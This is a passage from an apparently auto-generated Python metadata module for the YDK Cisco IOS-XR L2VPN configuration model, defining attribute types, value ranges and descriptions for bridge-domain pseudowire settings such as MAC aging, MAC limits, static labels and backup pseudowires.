'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
False,
[
_MetaInfoClassMember('pseudowire-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' MAC Aging Time
''',
'pseudowire_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pseudowire_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
False,
[
_MetaInfoClassMember('pseudowire-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Bridge Access Pseudowire MAC address
limit enforcement action
''',
'pseudowire_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on a Bridge
Access Pseudowire after which MAC limit
action is taken
''',
'pseudowire_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Bridge Access Pseudowire
''',
'pseudowire_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Bridge-domain Pseudowire MAC
configuration mode
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging', REFERENCE_CLASS, 'PseudowireMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pseudowire_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable MAC Learning
''',
'pseudowire_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit', REFERENCE_CLASS, 'PseudowireMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pseudowire_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'pseudowire_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-secure', REFERENCE_CLASS, 'PseudowireMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
[], [],
''' MAC Secure
''',
'pseudowire_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
False,
[
_MetaInfoClassMember('bd-pw-split-horizon-group', REFERENCE_CLASS, 'BdPwSplitHorizonGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
[], [],
''' Split Horizon Group
''',
'bd_pw_split_horizon_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domain-backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bridge_domain_backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
False,
[
_MetaInfoClassMember('bridge-domain-backup-pseudowire', REFERENCE_LIST, 'BridgeDomainBackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
[], [],
''' Backup pseudowire configuration
''',
'bridge_domain_backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bd_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-mpls-static-labels', REFERENCE_CLASS, 'BdPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'bd_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-split-horizon', REFERENCE_CLASS, 'BdPwSplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
[], [],
''' Split Horizon
''',
'bd_pw_split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-static-mac-addresses', REFERENCE_CLASS, 'BdPwStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'bd_pw_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bdpw-storm-control-types', REFERENCE_CLASS, 'BdpwStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
[], [],
''' Storm Control
''',
'bdpw_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-backup-pseudowires', REFERENCE_CLASS, 'BridgeDomainBackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
[], [],
''' List of pseudowires
''',
'bridge_domain_backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai', REFERENCE_CLASS, 'PseudowireDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
[], [],
''' Access Pseudowire Dynamic ARP Inspection
''',
'pseudowire_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding
''',
'pseudowire_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding Unknown
Unicast
''',
'pseudowire_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pseudowire_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-ip-source-guard', REFERENCE_CLASS, 'PseudowireIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
[], [],
''' IP Source Guard
''',
'pseudowire_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac', REFERENCE_CLASS, 'PseudowireMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
[], [],
''' Bridge-domain Pseudowire MAC
configuration commands
''',
'pseudowire_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'pseudowire_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-profile', REFERENCE_CLASS, 'PseudowireProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
[], [],
''' Attach a DHCP profile
''',
'pseudowire_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
False,
[
_MetaInfoClassMember('bd-pseudowire', REFERENCE_LIST, 'BdPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
[], [],
''' Pseudowire configuration
''',
'bd_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
False,
[
_MetaInfoClassMember('transport-name', ATTRIBUTE, 'str' , None, None,
[], ['(RSVP_TE)'],
''' Transport Type
''',
'transport_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attribute-set-name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Multicast P2MP TE Attribute Set Name
''',
'attribute_set_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transport',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
False,
[
_MetaInfoClassMember('transport', REFERENCE_LIST, 'Transport' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
[], [],
''' Multicast P2MP Transport Type
''',
'transport',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transports',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
False,
[
_MetaInfoClassMember('signaling-name', ATTRIBUTE, 'str' , None, None,
[], ['(BGP)'],
''' Signaling Type
''',
'signaling_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
False,
[
_MetaInfoClassMember('signaling', REFERENCE_LIST, 'Signaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
[], [],
''' Multicast P2MP Signaling Type
''',
'signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signalings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery P2MP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signalings', REFERENCE_CLASS, 'Signalings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
[], [],
''' Multicast P2MP Signaling Type
''',
'signalings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transports', REFERENCE_CLASS, 'Transports' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
[], [],
''' Multicast P2MP Transport
''',
'transports',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'multicast-p2mp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-dhcp-snoop',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
False,
[
_MetaInfoClassMember('pseudowire-static-mac-address', REFERENCE_LIST, 'PseudowireStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'pseudowire_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
